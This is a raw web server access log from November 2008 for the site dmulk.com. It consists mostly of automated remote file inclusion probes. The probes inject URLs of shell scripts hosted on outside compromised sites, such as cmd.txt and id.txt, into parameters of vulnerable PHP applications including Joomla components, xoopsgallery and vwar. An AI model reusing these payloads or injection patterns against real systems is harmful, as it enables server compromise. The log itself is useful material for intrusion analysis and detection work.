91.151.93.132 - - [10/Nov/2008:09:14:05 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
63.246.30.14 - - [10/Nov/2008:09:14:06 -0800] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.30.14 - - [10/Nov/2008:09:14:06 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.30.14 - - [10/Nov/2008:09:14:06 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.30.14 - - [10/Nov/2008:09:14:06 -0800] "GET /skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:14:07 -0800] "GET /logs/access_080516.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:09:14:09 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
65.55.211.37 - - [10/Nov/2008:09:14:09 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
85.214.17.211 - - [10/Nov/2008:09:14:10 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:09:14:10 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
64.33.51.184 - - [10/Nov/2008:09:14:12 -0800] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.51.184 - - [10/Nov/2008:09:14:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.51.184 - - [10/Nov/2008:09:14:13 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.51.184 - - [10/Nov/2008:09:14:13 -0800] "GET /skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.37 - - [10/Nov/2008:09:14:16 -0800] "GET /blog/index.php/2008/08/16/techstoc-2008-71208/ HTTP/1.1" 200 8263 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:14:25 -0800] "GET /logs/access_080516.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:14:38 -0800] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:14:43 -0800] "GET /logs/access_080907.log//index_for.php?classified_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:14:50 -0800] "GET /logs/access_071111.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:14:51 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:14:54 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:14:57 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.114.169 - - [10/Nov/2008:09:14:57 -0800] "GET /logs//appserv/main.php?appserv_root=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.88.114.169 - - [10/Nov/2008:09:14:58 -0800] "GET /appserv/main.php?appserv_root=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:14:59 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:14:59 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:15:01 -0800] "GET /logs/access_071214.log//?_zb_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:15:02 -0800] "GET /?_zb_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 94942 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:15:03 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:15:06 -0800] "GET /logs//?_zb_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 73026 "-" "libwww-perl/5.79" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:15:07 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:15:07 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:15:08 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:15:08 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:15:08 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:15:12 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:15:12 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:15:13 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:15:15 -0800] "GET /logs/access_080116.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:15:19 -0800] "GET /logs/access_080606.log/joomla/index.php?option=com_restaurante&task=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:15:23 -0800] "GET /logs/access_080606.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:09:15:24 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:09:15:26 -0800] "GET /logs/access_080427.log/lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:09:15:27 -0800] "GET /lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:09:15:27 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:15:28 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:15:28 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:09:15:31 -0800] "GET /logs/access_080308.log/lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:09:15:32 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:15:38 -0800] "GET /logs/access_071111.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:15:38 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:15:39 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:15:41 -0800] "GET /logs/access_071204.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:15:41 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:15:41 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.26 - - [10/Nov/2008:09:15:49 -0800] "GET /tmp/sess_19b2d643dbe2861fee2db607a3b1f942 HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:15:56 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:15:56 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:09:16:00 -0800] "GET /logs/access_080529.log/display.php?page=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:16:01 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:16:01 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:16:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:16:06 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:16:06 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:16:06 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:16:09 -0800] "GET /logs/access_071204.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:16:09 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:16:10 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:16:24 -0800] "GET /logs/access_080516.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:16:24 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:16:33 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:16:33 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:16:33 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:16:34 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:16:43 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:16:43 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:16:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:16:48 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:16:48 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:16:53 -0800] "GET /logs/index2.php?x=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:16:54 -0800] "GET /index2.php?x=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:16:55 -0800] "GET /logs/access_080116.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:17:01 -0800] "GET /logs/access_080702.log//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:17:02 -0800] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:17:02 -0800] "GET /logs//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:17:04 -0800] "GET /logs/access_080516.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.48.115.61 - - [10/Nov/2008:09:17:16 -0800] "GET /logs//modules/Forums/admin/errors.php?error=http://peppe951.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
82.48.115.61 - - [10/Nov/2008:09:17:25 -0800] "GET /logs/access_080412.log//modules/Forums/admin/errors.php?error=http://peppe951.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:17:25 -0800] "GET /logs/access_080319.log//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:17:38 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.166.200 - - [10/Nov/2008:09:17:39 -0800] "GET /logs//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.248.166.200 - - [10/Nov/2008:09:17:39 -0800] "GET /logs/access_071111.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.248.166.200 - - [10/Nov/2008:09:17:40 -0800] "GET /index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94705 "-" "Mozilla/5.0" "www.dmulk.com"
89.248.166.200 - - [10/Nov/2008:09:17:42 -0800] "GET /logs/access_080116.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:17:50 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:17:50 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:17:53 -0800] "GET /logs/access_071111.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:17:53 -0800] "GET /logs//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:17:53 -0800] "GET /index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94737 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:17:57 -0800] "GET /logs/access_080116.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:17:58 -0800] "GET /logs//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:17:58 -0800] "GET /logs/access_071111.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:17:58 -0800] "GET /logs/access_080116.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:17:58 -0800] "GET /logs/access_080216.log/oneadmin/newspublish//include.php?path[docroot]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:17:59 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:17:59 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:17:59 -0800] "GET /oneadmin/newspublish//include.php?path[docroot]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:17:59 -0800] "GET /logs/oneadmin/newspublish//include.php?path[docroot]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:17:59 -0800] "GET /index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94721 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:18:00 -0800] "GET /logs/access_080216.log/oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:18:01 -0800] "GET /oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:18:01 -0800] "GET /logs/oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:18:05 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
